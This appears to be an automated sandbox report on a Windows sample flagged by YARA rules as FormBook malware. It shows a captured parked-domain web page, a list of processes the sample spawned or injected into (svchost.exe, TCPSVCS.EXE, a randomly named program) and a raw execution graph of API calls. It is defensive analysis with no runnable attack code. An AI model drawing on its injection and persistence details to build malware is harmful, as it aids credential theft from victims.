                                                                              Data Raw: 3c 21 64 6f 63 74 79 70 65 20 68 74 6d 6c 3e 3c 74 69 74 6c 65 3e 50 61 72 6b 65 64 20 44 6f 6d 61 69 6e 20 6e 61 6d 65 20 6f 6e 20 48 6f 73 74 69 6e 67 65 72 20 44 4e 53 20 73 79 73 74 65 6d 3c 2f 74 69 74 6c 65 3e 3c 6d 65 74 61 20 63 68 61 72 73 65 74 3d 75 74 66 2d 38 3e 3c 6d 65 74 61 20 63 6f 6e 74 65 6e 74 3d 22 49 45 3d 65 64 67 65 2c 63 68 72 6f 6d 65 3d 31 22 20 68 74 74 70 2d 65 71 75 69 76 3d 58 2d 55 41 2d 43 6f 6d 70 61 74 69 62 6c 65 3e 3c 6d 65 74 61 20 63 6f 6e 74 65 6e 74 3d 22 50 61 72 6b 65 64 20 44 6f 6d 61 69 6e 20 6e 61 6d 65 20 6f 6e 20 48 6f 73 74 69 6e 67 65 72 20 44 4e 53 20 73 79 73 74 65 6d 22 20 6e 61 6d 65 3d 64 65 73 63 72 69 70 74 69 6f 6e 3e 3c 6d 65 74 61 20 63 6f 6e 74 65 6e 74 3d 22 77 69 64 74 68 3d 64 65 76 69 63 65 2d 77 69 64 74 68 2c 69 6e 69 74 69 61 6c 2d 73 63 61 6c 65 3d 31 22 20 6e 61 6d 65 3d 76 69 65 77 70 6f 72 74 3e 3c 6c 69 6e 6b 20 68 72 65 66 3d 68 74 74 70 73 3a 2f 2f 6d 61 78 63 64 6e 2e 62 6f 6f 74 73 74 72 61 70 63 64 6e 2e 63 6f 6d 2f 62 6f [TRUNCATED]
                                                                              Data Ascii: <!doctype html><title>Parked Domain name on Hostinger DNS system</title><meta charset=utf-8><meta content="IE=edge,chrome=1" http-equiv=X-UA-Compatible><meta content="Parked Domain name on Hostinger DNS system" name=description><meta content="width=device-width,initial-scale=1" name=viewport><link href=https://maxcdn.bootstrapcdn.com/bootstrap/3.3.7/css/bootstrap.min.css rel=stylesheet><script src=https://ajax.googleapis.com/ajax/libs/jquery/3.2.1/jquery.min.js></script><script src=https://maxcdn.bootstrapcdn.com/bootstrap/3.3.7/js/bootstrap.min.js></script><link href=https://cdnjs.cloudflare.com/ajax/libs/font-awesome/5.15.3/css/all.min.css rel=stylesheet><link href="https://fonts.googleapis.com/css?family=Open+Sans:300,300i,400,400i,600,600i,700,700i,800,800i&subset=cyrillic,cyrillic-ext,greek,greek-ext,latin-ext,vietnamese" rel=stylesheet><style>html{height:100%}body{font-family:"O
                                                                              Jan 10, 2025 18:57:16.592070103 CET  1236               IN         Data Raw: 70 65 6e 20 53 61 6e 73 22 2c 48 65 6c 76 65 74 69 63 61 2c 73 61 6e 73 2d 73 65 72 69 66 3b 63 6f 6c 6f 72 3a 23 30 30 30 3b 70 61 64 64 69 6e 67 3a 30 3b 6d 61 72 67 69 6e 3a 30 3b 6c 69 6e 65 2d 68 65 69 67 68 74 3a 31 2e 34 32 38 3b 62 61 63
                                                                              Data Ascii: pen Sans",Helvetica,sans-serif;color:#000;padding:0;margin:0;line-height:1.428;background:linear-gradient(10.7deg,#e9edfb -50.21%,#f6f8fd 31.11%,#fff 166.02%)}h1,h2,h3,h4,h5,h6,p{padding:0;margin:0;color:#333}h1{font-size:30px;font-weight:600!
                                                                              Jan 10, 2025 18:57:16.592082977 CET  448                IN         Data Raw: 3b 66 6f 6e 74 2d 73 69 7a 65 3a 31 33 70 78 3b 70 61 64 64 69 6e 67 2d 6c 65 66 74 3a 35 70 78 3b 70 61 64 64 69 6e 67 2d 72 69 67 68 74 3a 35 70 78 7d 2e 6e 61 76 62 61 72 2d 6e 61 76 3e 6c 69 3e 61 3a 68 6f 76 65 72 7b 74 65 78 74 2d 64 65 63
                                                                              Data Ascii: ;font-size:13px;padding-left:5px;padding-right:5px}.navbar-nav>li>a:hover{text-decoration:none;color:#cdc3ea!important}.navbar-nav>li>a i{margin-right:5px}.nav-bar img{position:relative;top:3px}.congratz{margin:0 auto;text-align:center}.top-co
                                                                              Jan 10, 2025 18:57:16.592187881 CET  1236               IN         Data Raw: 3b 62 6f 72 64 65 72 2d 72 61 64 69 75 73 3a 35 70 78 3b 70 6f 73 69 74 69 6f 6e 3a 72 65 6c 61 74 69 76 65 7d 2e 6d 65 73 73 61 67 65 20 70 7b 66 6f 6e 74 2d 77 65 69 67 68 74 3a 34 30 30 3b 66 6f 6e 74 2d 73 69 7a 65 3a 31 34 70 78 3b 6c 69 6e
                                                                              Data Ascii: ;border-radius:5px;position:relative}.message p{font-weight:400;font-size:14px;line-height:24px}#pathName{color:#2f1c6a;font-weight:700;overflow-wrap:break-word;font-size:40px;line-height:48px;margin-bottom:16px}.section-title{color:#2f1c6a;fo
                                                                              Jan 10, 2025 18:57:16.592200041 CET  1236               IN         Data Raw: 7d 2e 6e 61 76 62 61 72 2d 6c 69 6e 6b 73 7b 64 69 73 70 6c 61 79 3a 66 6c 65 78 3b 66 6c 65 78 2d 64 69 72 65 63 74 69 6f 6e 3a 63 6f 6c 75 6d 6e 3b 61 6c 69 67 6e 2d 69 74 65 6d 73 3a 63 65 6e 74 65 72 7d 2e 6e 61 76 62 61 72 2d 6c 69 6e 6b 73
                                                                              Data Ascii: }.navbar-links{display:flex;flex-direction:column;align-items:center}.navbar-links>li{margin:0}.top-container{flex-direction:column-reverse}}</style><script src="https://www.googletagmanager.com/gtag/js?id=UA-26575989-44" async></script><scrip
                                                                              Jan 10, 2025 18:57:16.592221975 CET1236INData Raw: 61 2d 68 69 64 64 65 6e 3d 74 72 75 65 20 63 6c 61 73 73 3d 22 66 61 73 20 66 61 2d 75 73 65 72 73 22 3e 3c 2f 69 3e 20 41 66 66 69 6c 69 61 74 65 73 3c 2f 61 3e 3c 2f 6c 69 3e 3c 6c 69 3e 3c 61 20 68 72 65 66 3d 68 74 74 70 73 3a 2f 2f 68 70 61
                                                                              Data Ascii: a-hidden=true class="fas fa-users"></i> Affiliates</a></li><li><a href=https://hpanel.hostinger.com/login rel=nofollow><i aria-hidden=true class="fas fa-sign-in-alt"></i> Login</a></li></ul></div></div></nav><div class=empty-account-page><div
                                                                              Jan 10, 2025 18:57:16.592235088 CET672INData Raw: 6f 75 72 20 77 65 62 73 69 74 65 20 74 6f 20 61 6e 79 20 6f 66 20 79 6f 75 72 20 68 6f 73 74 69 6e 67 20 70 6c 61 6e 73 2e 20 46 6f 6c 6c 6f 77 20 74 68 65 20 61 72 74 69 63 6c 65 20 62 65 6c 6f 77 20 74 6f 20 61 64 64 20 79 6f 75 72 20 64 6f 6d
                                                                              Data Ascii: our website to any of your hosting plans. Follow the article below to add your domain at Hostinger.</p><br><a href=https://support.hostinger.com/en/articles/1583214-how-to-add-a-domain-to-my-account-how-to-add-website rel=nofollow>Add a websit
                                                                              Jan 10, 2025 18:57:16.592251062 CET1236INData Raw: 6f 64 65 3d 6e 65 77 20 66 75 6e 63 74 69 6f 6e 28 29 7b 74 68 69 73 2e 75 74 66 31 36 3d 7b 64 65 63 6f 64 65 3a 66 75 6e 63 74 69 6f 6e 28 6f 29 7b 66 6f 72 28 76 61 72 20 72 2c 65 2c 6e 3d 5b 5d 2c 74 3d 30 2c 61 3d 6f 2e 6c 65 6e 67 74 68 3b
                                                                              Data Ascii: ode=new function(){this.utf16={decode:function(o){for(var r,e,n=[],t=0,a=o.length;t<a;){if(55296==(63488&(r=o.charCodeAt(t++)))){if(e=o.charCodeAt(t++),55296!=(64512&r)||56320!=(64512&e))throw new RangeError("UTF-16(decode): Illegal UTF-16 seq
                                                                              Jan 10, 2025 18:57:16.592262030 CET224INData Raw: 74 68 72 6f 77 20 52 61 6e 67 65 45 72 72 6f 72 28 22 70 75 6e 79 63 6f 64 65 5f 62 61 64 5f 69 6e 70 75 74 28 32 29 22 29 3b 69 66 28 73 3e 4d 61 74 68 2e 66 6c 6f 6f 72 28 28 72 2d 66 29 2f 70 29 29 74 68 72 6f 77 20 52 61 6e 67 65 45 72 72 6f
                                                                              Data Ascii: throw RangeError("punycode_bad_input(2)");if(s>Math.floor((r-f)/p))throw RangeError("punycode_overflow(1)");if(f+=s*p,s<(C=g<=i?1:i+26<=g?26:g-i))break;if(p>Math.floor(r/(o-C)))throw RangeError("punycode_overflow(2)");p*=o-C
                                                                              Jan 10, 2025 18:57:16.592278004 CET1236INData Raw: 7d 69 66 28 69 3d 6e 28 66 2d 6c 2c 68 3d 6d 2e 6c 65 6e 67 74 68 2b 31 2c 30 3d 3d 3d 6c 29 2c 4d 61 74 68 2e 66 6c 6f 6f 72 28 66 2f 68 29 3e 72 2d 61 29 74 68 72 6f 77 20 52 61 6e 67 65 45 72 72 6f 72 28 22 70 75 6e 79 63 6f 64 65 5f 6f 76 65
                                                                              Data Ascii: }if(i=n(f-l,h=m.length+1,0===l),Math.floor(f/h)>r-a)throw RangeError("punycode_overflow(3)");a+=Math.floor(f/h),f%=h,t&&y.splice(f,0,e.charCodeAt(d-1)-65<26),m.splice(f,0,a),f++}if(t)for(f=0,w=m.length;f<w;f++)y[f]&&(m[f]=String.fromCharCode(m
                                                                              Jan 10, 2025 18:57:16.592295885 CET316INData Raw: 7d 72 65 74 75 72 6e 20 65 2e 6a 6f 69 6e 28 22 2e 22 29 7d 2c 74 68 69 73 2e 54 6f 55 6e 69 63 6f 64 65 3d 66 75 6e 63 74 69 6f 6e 28 6f 29 7b 66 6f 72 28 76 61 72 20 72 3d 6f 2e 73 70 6c 69 74 28 22 2e 22 29 2c 65 3d 5b 5d 2c 6e 3d 30 3b 6e 3c
                                                                              Data Ascii: }return e.join(".")},this.ToUnicode=function(o){for(var r=o.split("."),e=[],n=0;n<r.length;++n){var t=r[n];e.push(t.match(/^xn--/)?punycode.decode(t.slice(4)):t)}return e.join(".")}},pathName=window.location.hostname,account=document.getElemen


                                                                              Click to jump to process

                                                                              Click to jump to process

                                                                              Click to dive into process behavior distribution

                                                                              Click to jump to process

                                                                              Target ID:0
                                                                              Start time:12:53:10
                                                                              Start date:10/01/2025
                                                                              Path:C:\Users\user\Desktop\ofZiNLLKZU.exe
                                                                              Wow64 process (32bit):true
                                                                              Commandline:"C:\Users\user\Desktop\ofZiNLLKZU.exe"
                                                                              Imagebase:0x5d0000
                                                                              File size:1'265'664 bytes
                                                                              MD5 hash:68056372ED7E2AB369235BF4C2E9CFB5
                                                                              Has elevated privileges:true
                                                                              Has administrator privileges:true
                                                                              Programmed in:C, C++ or other language
                                                                              Reputation:low
                                                                              Has exited:true

                                                                              Target ID:2
                                                                              Start time:12:53:13
                                                                              Start date:10/01/2025
                                                                              Path:C:\Windows\SysWOW64\svchost.exe
                                                                              Wow64 process (32bit):true
                                                                              Commandline:"C:\Users\user\Desktop\ofZiNLLKZU.exe"
                                                                              Imagebase:0xed0000
                                                                              File size:46'504 bytes
                                                                              MD5 hash:1ED18311E3DA35942DB37D15FA40CC5B
                                                                              Has elevated privileges:true
                                                                              Has administrator privileges:true
                                                                              Programmed in:C, C++ or other language
                                                                              Yara matches:
                                                                              • Rule: JoeSecurity_FormBook_1, Description: Yara detected FormBook, Source: 00000002.00000002.1724553623.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Author: Joe Security
                                                                              • Rule: JoeSecurity_FormBook_1, Description: Yara detected FormBook, Source: 00000002.00000002.1724963912.0000000003790000.00000040.10000000.00040000.00000000.sdmp, Author: Joe Security
                                                                              • Rule: JoeSecurity_FormBook_1, Description: Yara detected FormBook, Source: 00000002.00000002.1725326786.0000000003D50000.00000040.10000000.00040000.00000000.sdmp, Author: Joe Security
                                                                              Reputation:high
                                                                              Has exited:true

                                                                              Target ID:4
                                                                              Start time:12:53:31
                                                                              Start date:10/01/2025
                                                                              Path:C:\Program Files (x86)\WZaRJgWqaZnlanYMugHJJfSBsdZDToQmpSEoBNFKchcsoSZJVF\kwRriiLHUBrBci.exe
                                                                              Wow64 process (32bit):true
                                                                              Commandline:"C:\Program Files (x86)\WZaRJgWqaZnlanYMugHJJfSBsdZDToQmpSEoBNFKchcsoSZJVF\kwRriiLHUBrBci.exe"
                                                                              Imagebase:0xba0000
                                                                              File size:140'800 bytes
                                                                              MD5 hash:32B8AD6ECA9094891E792631BAEA9717
                                                                              Has elevated privileges:false
                                                                              Has administrator privileges:false
                                                                              Programmed in:C, C++ or other language
                                                                              Yara matches:
                                                                              • Rule: JoeSecurity_FormBook_1, Description: Yara detected FormBook, Source: 00000004.00000002.3902676049.0000000002C90000.00000040.00000001.00040000.00000000.sdmp, Author: Joe Security
                                                                              Reputation:high
                                                                              Has exited:false

                                                                              Target ID:5
                                                                              Start time:12:53:32
                                                                              Start date:10/01/2025
                                                                              Path:C:\Windows\SysWOW64\TCPSVCS.EXE
                                                                              Wow64 process (32bit):true
                                                                              Commandline:"C:\Windows\SysWOW64\TCPSVCS.EXE"
                                                                              Imagebase:0x2e0000
                                                                              File size:10'752 bytes
                                                                              MD5 hash:73905DB831B4F37F0673D2DD5BBF7779
                                                                              Has elevated privileges:false
                                                                              Has administrator privileges:false
                                                                              Programmed in:C, C++ or other language
                                                                              Yara matches:
                                                                              • Rule: JoeSecurity_FormBook_1, Description: Yara detected FormBook, Source: 00000005.00000002.3900696034.0000000002600000.00000004.00000800.00020000.00000000.sdmp, Author: Joe Security
                                                                              • Rule: JoeSecurity_FormBook_1, Description: Yara detected FormBook, Source: 00000005.00000002.3900973185.0000000002790000.00000004.00000800.00020000.00000000.sdmp, Author: Joe Security
                                                                              • Rule: JoeSecurity_FormBook_1, Description: Yara detected FormBook, Source: 00000005.00000002.3900101760.0000000000130000.00000040.80000000.00040000.00000000.sdmp, Author: Joe Security
                                                                              Reputation:low
                                                                              Has exited:false

                                                                              Target ID:6
                                                                              Start time:12:53:47
                                                                              Start date:10/01/2025
                                                                              Path:C:\Program Files (x86)\WZaRJgWqaZnlanYMugHJJfSBsdZDToQmpSEoBNFKchcsoSZJVF\kwRriiLHUBrBci.exe
                                                                              Wow64 process (32bit):true
                                                                              Commandline:"C:\Program Files (x86)\WZaRJgWqaZnlanYMugHJJfSBsdZDToQmpSEoBNFKchcsoSZJVF\kwRriiLHUBrBci.exe"
                                                                              Imagebase:0xba0000
                                                                              File size:140'800 bytes
                                                                              MD5 hash:32B8AD6ECA9094891E792631BAEA9717
                                                                              Has elevated privileges:false
                                                                              Has administrator privileges:false
                                                                              Programmed in:C, C++ or other language
                                                                              Yara matches:
                                                                              • Rule: JoeSecurity_FormBook_1, Description: Yara detected FormBook, Source: 00000006.00000002.3905770259.0000000004F80000.00000040.80000000.00040000.00000000.sdmp, Author: Joe Security
                                                                              Reputation:high
                                                                              Has exited:false

                                                                              Target ID:10
                                                                              Start time:12:54:02
                                                                              Start date:10/01/2025
                                                                              Path:C:\Program Files\Mozilla Firefox\firefox.exe
                                                                              Wow64 process (32bit):false
                                                                              Commandline:"C:\Program Files\Mozilla Firefox\Firefox.exe"
                                                                              Imagebase:0x7ff6d20e0000
                                                                              File size:676'768 bytes
                                                                              MD5 hash:C86B1BE9ED6496FE0E0CBE73F81D8045
                                                                              Has elevated privileges:false
                                                                              Has administrator privileges:false
                                                                              Programmed in:C, C++ or other language
                                                                              Reputation:high
                                                                              Has exited:true


                                                                                Execution Graph

                                                                                Execution Coverage:3%
                                                                                Dynamic/Decrypted Code Coverage:2.1%
                                                                                Signature Coverage:5.3%
                                                                                Total number of Nodes:1870
                                                                                Total number of Limit Nodes:45
96456 615058 96455->96456 96457 5efddb 22 API calls 96456->96457 96458 61507f 96457->96458 96459 5d9cb3 22 API calls 96458->96459 96459->96460 96492 5efb21 51 API calls 96460->96492 96494 5d6270 96461->96494 96463 5d9fd2 96500 5da4a1 96463->96500 96465 5d9fec 96465->96313 96468 61f7c4 96523 6396e2 84 API calls __wsopen_s 96468->96523 96469 61f699 96476 5efddb 22 API calls 96469->96476 96471 5da405 96471->96465 96524 6396e2 84 API calls __wsopen_s 96471->96524 96473 5da6c3 22 API calls 96487 5d9eb5 96473->96487 96475 61f7d2 96477 5da4a1 22 API calls 96475->96477 96478 61f754 96476->96478 96479 61f7e8 96477->96479 96480 5efe0b 22 API calls 96478->96480 96479->96465 96482 5da12c __fread_nolock 96480->96482 96482->96468 96482->96471 96485 5da0db CharUpperBuffW 96519 5da673 22 API calls 96485->96519 96487->96463 96487->96468 96487->96469 96487->96471 96487->96473 96487->96482 96488 5da4a1 22 API calls 96487->96488 96499 5d4573 41 API calls _wcslen 96487->96499 96508 5da587 96487->96508 96513 5daec9 96487->96513 96520 5d48c8 23 API calls 96487->96520 96521 5d49bd 22 API calls __fread_nolock 96487->96521 96522 5da673 22 API calls 96487->96522 96488->96487 96489->96317 96490->96445 96491->96445 96492->96442 96493->96447 96495 5efe0b 22 API calls 96494->96495 96496 5d6295 96495->96496 96497 5efddb 22 API calls 96496->96497 96498 5d62a3 96497->96498 96498->96487 96499->96487 96501 5da52b 96500->96501 96507 5da4b1 __fread_nolock 96500->96507 96503 5efe0b 22 API calls 96501->96503 96502 5efddb 22 API calls 96504 5da4b8 96502->96504 96503->96507 96505 5efddb 22 API calls 96504->96505 96506 5da4d6 96504->96506 96505->96506 96506->96465 96507->96502 96509 5da59d 96508->96509 96512 5da598 __fread_nolock 96508->96512 96510 5efe0b 22 API calls 96509->96510 96511 61f80f 96509->96511 96510->96512 96512->96487 96514 5daedc 96513->96514 96515 5daed9 __fread_nolock 96513->96515 96516 5efddb 22 API calls 96514->96516 96515->96485 96517 5daee7 96516->96517 96518 5efe0b 22 API calls 
96517->96518 96518->96515 96519->96487 96520->96487 96521->96487 96522->96487 96523->96475 96524->96465 96740 5d4e90 LoadLibraryA 96525->96740 96530 5d4ef6 LoadLibraryExW 96748 5d4e59 LoadLibraryA 96530->96748 96531 613ccf 96533 5d4f39 68 API calls 96531->96533 96535 613cd6 96533->96535 96537 5d4e59 3 API calls 96535->96537 96538 613cde 96537->96538 96770 5d50f5 96538->96770 96539 5d4f20 96539->96538 96540 5d4f2c 96539->96540 96542 5d4f39 68 API calls 96540->96542 96544 5d4f31 96542->96544 96544->96333 96544->96334 96546 613d05 96548 5da961 22 API calls 96547->96548 96549 5d5275 96548->96549 96550 5da961 22 API calls 96549->96550 96551 5d527d 96550->96551 96552 5da961 22 API calls 96551->96552 96553 5d5285 96552->96553 96554 5da961 22 API calls 96553->96554 96555 5d528d 96554->96555 96556 613df5 96555->96556 96557 5d52c1 96555->96557 96559 5da8c7 22 API calls 96556->96559 96558 5d6d25 22 API calls 96557->96558 96561 5d52cf 96558->96561 96560 613dfe 96559->96560 96921 5da6c3 96560->96921 96917 5d93b2 96561->96917 96564 5d52d9 96565 5d5304 96564->96565 96566 5d6d25 22 API calls 96564->96566 96567 5d5325 96565->96567 96581 5d5349 96565->96581 96584 613e20 96565->96584 96569 5d52fa 96566->96569 96571 5d4c6d 22 API calls 96567->96571 96567->96581 96570 5d93b2 22 API calls 96569->96570 96570->96565 96577 5d5332 96571->96577 96572 5d6b57 22 API calls 96586 613ee0 96572->96586 96573 5d535a 96575 5d5370 96573->96575 96578 5da8c7 22 API calls 96573->96578 96574 5d5384 96576 5d538f 96574->96576 96582 5da8c7 22 API calls 96574->96582 96575->96574 96579 5da8c7 22 API calls 96575->96579 96583 5da8c7 22 API calls 96576->96583 96587 5d539a 96576->96587 96580 5d6d25 22 API calls 96577->96580 96577->96581 96578->96575 96579->96574 96580->96581 96904 5d6d25 96581->96904 96582->96576 96583->96587 96584->96572 96585 5d4c6d 22 API calls 96585->96586 96586->96581 96586->96585 96927 5d49bd 22 API calls __fread_nolock 96586->96927 96587->96368 96590 5daec9 22 API calls 96589->96590 96591 
5d4c78 96590->96591 96591->96373 96591->96375 96593 614a51 96592->96593 96594 5d6362 96592->96594 96939 5d4a88 22 API calls __fread_nolock 96593->96939 96929 5d6373 96594->96929 96597 5d636e 96597->96381 96598 614a5b 96599 5da8c7 22 API calls 96598->96599 96600 614a67 96598->96600 96599->96600 96602 63d7d8 96601->96602 96603 63d7f3 96602->96603 96604 63d7dd 96602->96604 96606 5da961 22 API calls 96603->96606 96605 63d7ee 96604->96605 96607 5da8c7 22 API calls 96604->96607 96605->96390 96608 63d7fb 96606->96608 96607->96605 96609 5da961 22 API calls 96608->96609 96610 63d803 96609->96610 96611 5da961 22 API calls 96610->96611 96612 63d80e 96611->96612 96613 5da961 22 API calls 96612->96613 96614 63d816 96613->96614 96615 5da961 22 API calls 96614->96615 96616 63d81e 96615->96616 96617 5da961 22 API calls 96616->96617 96618 63d826 96617->96618 96619 5da961 22 API calls 96618->96619 96620 63d82e 96619->96620 96621 5da961 22 API calls 96620->96621 96622 63d836 96621->96622 96623 5d525f 22 API calls 96622->96623 96624 63d84d 96623->96624 96625 5d525f 22 API calls 96624->96625 96626 63d866 96625->96626 96627 5d4c6d 22 API calls 96626->96627 96628 63d872 96627->96628 96629 63d885 96628->96629 96631 5d93b2 22 API calls 96628->96631 96630 5d4c6d 22 API calls 96629->96630 96632 63d88e 96630->96632 96631->96629 96633 63d89e 96632->96633 96634 5d93b2 22 API calls 96632->96634 96635 63d8b0 96633->96635 96636 5da8c7 22 API calls 96633->96636 96634->96633 96637 5d6350 22 API calls 96635->96637 96636->96635 96638 63d8bb 96637->96638 96940 63d978 22 API calls 96638->96940 96640 63d8ca 96941 63d978 22 API calls 96640->96941 96642 63d8dd 96643 5d4c6d 22 API calls 96642->96643 96644 63d8e7 96643->96644 96645 63d8fe 96644->96645 96646 63d8ec 96644->96646 96648 5d4c6d 22 API calls 96645->96648 96647 5d33c6 22 API calls 96646->96647 96649 63d8f9 96647->96649 96650 63d907 96648->96650 96653 5d6350 22 API calls 96649->96653 96651 63d925 96650->96651 96652 5d33c6 22 API calls 96650->96652 
96654 5d6350 22 API calls 96651->96654 96652->96649 96653->96651 96654->96605 96656 642954 __wsopen_s 96655->96656 96657 5efe0b 22 API calls 96656->96657 96658 642971 96657->96658 96659 5d5722 22 API calls 96658->96659 96660 64297b 96659->96660 96661 64274e 27 API calls 96660->96661 96662 642986 96661->96662 96663 5d511f 64 API calls 96662->96663 96664 64299b 96663->96664 96665 642a6c 96664->96665 96666 6429bf 96664->96666 96667 642e66 75 API calls 96665->96667 96968 642e66 96666->96968 96683 642a38 96667->96683 96671 5d50f5 40 API calls 96672 642a91 96671->96672 96673 5d50f5 40 API calls 96672->96673 96676 642aa1 96673->96676 96674 642a75 ISource 96674->96397 96675 6429ed 96975 5fd583 26 API calls 96675->96975 96677 5d50f5 40 API calls 96676->96677 96679 642abc 96677->96679 96680 5d50f5 40 API calls 96679->96680 96681 642acc 96680->96681 96682 5d50f5 40 API calls 96681->96682 96684 642ae7 96682->96684 96683->96671 96683->96674 96685 5d50f5 40 API calls 96684->96685 96686 642af7 96685->96686 96687 5d50f5 40 API calls 96686->96687 96688 642b07 96687->96688 96689 5d50f5 40 API calls 96688->96689 96690 642b17 96689->96690 96942 643017 GetTempPathW GetTempFileNameW 96690->96942 96692 642b22 96693 5fe5eb 29 API calls 96692->96693 96695 642b33 96693->96695 96695->96674 96697 5d50f5 40 API calls 96695->96697 96706 642bed 96695->96706 96943 5fdbb3 96695->96943 96696 642bf8 96698 642c12 96696->96698 96699 642bfe DeleteFileW 96696->96699 96697->96695 96700 642c91 CopyFileW 96698->96700 96704 642c18 96698->96704 96699->96674 96701 642ca7 DeleteFileW 96700->96701 96702 642cb9 DeleteFileW 96700->96702 96701->96674 96965 642fd8 CreateFileW 96702->96965 96976 6422ce 79 API calls 96704->96976 96952 5fe678 96706->96952 96708 642c7c 96708->96702 96709 642c80 DeleteFileW 96708->96709 96709->96674 96710->96323 96712 5d33dd 96711->96712 96713 6130bb 96711->96713 97200 5d33ee 96712->97200 96715 5efddb 22 API calls 96713->96715 96717 6130c5 _wcslen 96715->96717 96716 5d33e8 96716->96350 
96718 5efe0b 22 API calls 96717->96718 96719 6130fe __fread_nolock 96718->96719 96720->96357 96721->96371 96723 614ba1 96722->96723 96724 5d6b67 _wcslen 96722->96724 96725 5d93b2 22 API calls 96723->96725 96727 5d6b7d 96724->96727 96728 5d6ba2 96724->96728 96726 614baa 96725->96726 96726->96726 97210 5d6f34 22 API calls 96727->97210 96730 5efddb 22 API calls 96728->96730 96732 5d6bae 96730->96732 96731 5d6b85 __fread_nolock 96731->96382 96733 5efe0b 22 API calls 96732->96733 96733->96731 96735 5d4f4a 96734->96735 96736 5d4f43 96734->96736 96738 5d4f59 96735->96738 96739 5d4f6a FreeLibrary 96735->96739 96737 5fe678 67 API calls 96736->96737 96737->96735 96738->96340 96739->96738 96741 5d4ea8 GetProcAddress 96740->96741 96742 5d4ec6 96740->96742 96743 5d4eb8 96741->96743 96745 5fe5eb 96742->96745 96743->96742 96744 5d4ebf FreeLibrary 96743->96744 96744->96742 96778 5fe52a 96745->96778 96747 5d4eea 96747->96530 96747->96531 96749 5d4e8d 96748->96749 96750 5d4e6e GetProcAddress 96748->96750 96753 5d4f80 96749->96753 96751 5d4e7e 96750->96751 96751->96749 96752 5d4e86 FreeLibrary 96751->96752 96752->96749 96754 5efe0b 22 API calls 96753->96754 96755 5d4f95 96754->96755 96830 5d5722 96755->96830 96757 5d4fa1 __fread_nolock 96758 5d50a5 96757->96758 96759 613d1d 96757->96759 96769 5d4fdc 96757->96769 96833 5d42a2 CreateStreamOnHGlobal 96758->96833 96844 64304d 74 API calls 96759->96844 96762 613d22 96764 5d511f 64 API calls 96762->96764 96763 5d50f5 40 API calls 96763->96769 96765 613d45 96764->96765 96766 5d50f5 40 API calls 96765->96766 96768 5d506e ISource 96766->96768 96768->96539 96769->96762 96769->96763 96769->96768 96839 5d511f 96769->96839 96771 613d70 96770->96771 96772 5d5107 96770->96772 96866 5fe8c4 96772->96866 96775 6428fe 96887 64274e 96775->96887 96777 642919 96777->96546 96779 5fe536 __FrameHandler3::FrameUnwindToState 96778->96779 96780 5fe544 96779->96780 96783 5fe574 96779->96783 96803 5ff2d9 20 API calls _free 96780->96803 96782 5fe549 96804 6027ec 
26 API calls pre_c_initialization 96782->96804 96784 5fe579 96783->96784 96785 5fe586 96783->96785 96805 5ff2d9 20 API calls _free 96784->96805 96795 608061 96785->96795 96789 5fe58f 96790 5fe595 96789->96790 96791 5fe5a2 96789->96791 96806 5ff2d9 20 API calls _free 96790->96806 96807 5fe5d4 LeaveCriticalSection __fread_nolock 96791->96807 96792 5fe554 __wsopen_s 96792->96747 96796 60806d __FrameHandler3::FrameUnwindToState 96795->96796 96808 602f5e EnterCriticalSection 96796->96808 96798 60807b 96809 6080fb 96798->96809 96802 6080ac __wsopen_s 96802->96789 96803->96782 96804->96792 96805->96792 96806->96792 96807->96792 96808->96798 96813 60811e 96809->96813 96810 608088 96822 6080b7 96810->96822 96811 608177 96812 604c7d _free 20 API calls 96811->96812 96815 608180 96812->96815 96813->96810 96813->96811 96825 5f918d EnterCriticalSection 96813->96825 96826 5f91a1 LeaveCriticalSection 96813->96826 96816 6029c8 _free 20 API calls 96815->96816 96817 608189 96816->96817 96817->96810 96827 603405 11 API calls 2 library calls 96817->96827 96819 6081a8 96828 5f918d EnterCriticalSection 96819->96828 96829 602fa6 LeaveCriticalSection 96822->96829 96824 6080be 96824->96802 96825->96813 96826->96813 96827->96819 96828->96810 96829->96824 96831 5efddb 22 API calls 96830->96831 96832 5d5734 96831->96832 96832->96757 96834 5d42bc FindResourceExW 96833->96834 96835 5d42d9 96833->96835 96834->96835 96836 6135ba LoadResource 96834->96836 96835->96769 96836->96835 96837 6135cf SizeofResource 96836->96837 96837->96835 96838 6135e3 LockResource 96837->96838 96838->96835 96840 613d90 96839->96840 96841 5d512e 96839->96841 96845 5fece3 96841->96845 96844->96762 96848 5feaaa 96845->96848 96847 5d513c 96847->96769 96851 5feab6 __FrameHandler3::FrameUnwindToState 96848->96851 96849 5feac2 96861 5ff2d9 20 API calls _free 96849->96861 96851->96849 96852 5feae8 96851->96852 96863 5f918d EnterCriticalSection 96852->96863 96853 5feac7 96862 6027ec 26 API calls pre_c_initialization 96853->96862 
96856 5feaf4 96864 5fec0a 62 API calls 2 library calls 96856->96864 96858 5feb08 96865 5feb27 LeaveCriticalSection __fread_nolock 96858->96865 96860 5fead2 __wsopen_s 96860->96847 96861->96853 96862->96860 96863->96856 96864->96858 96865->96860 96869 5fe8e1 96866->96869 96868 5d5118 96868->96775 96870 5fe8ed __FrameHandler3::FrameUnwindToState 96869->96870 96871 5fe92d 96870->96871 96872 5fe900 ___scrt_fastfail 96870->96872 96873 5fe925 __wsopen_s 96870->96873 96884 5f918d EnterCriticalSection 96871->96884 96882 5ff2d9 20 API calls _free 96872->96882 96873->96868 96875 5fe937 96885 5fe6f8 38 API calls 4 library calls 96875->96885 96878 5fe91a 96883 6027ec 26 API calls pre_c_initialization 96878->96883 96879 5fe94e 96886 5fe96c LeaveCriticalSection __fread_nolock 96879->96886 96882->96878 96883->96873 96884->96875 96885->96879 96886->96873 96890 5fe4e8 96887->96890 96889 64275d 96889->96777 96893 5fe469 96890->96893 96892 5fe505 96892->96889 96894 5fe48c 96893->96894 96895 5fe478 96893->96895 96899 5fe488 __alldvrm 96894->96899 96903 60333f 11 API calls 2 library calls 96894->96903 96901 5ff2d9 20 API calls _free 96895->96901 96898 5fe47d 96902 6027ec 26 API calls pre_c_initialization 96898->96902 96899->96892 96901->96898 96902->96899 96903->96899 96905 5d6d34 96904->96905 96906 5d6d91 96904->96906 96905->96906 96908 5d6d3f 96905->96908 96907 5d93b2 22 API calls 96906->96907 96909 5d6d62 __fread_nolock 96907->96909 96910 5d6d5a 96908->96910 96911 614c9d 96908->96911 96909->96573 96928 5d6f34 22 API calls 96910->96928 96912 5efddb 22 API calls 96911->96912 96914 614ca7 96912->96914 96915 5efe0b 22 API calls 96914->96915 96916 614cda 96915->96916 96918 5d93c9 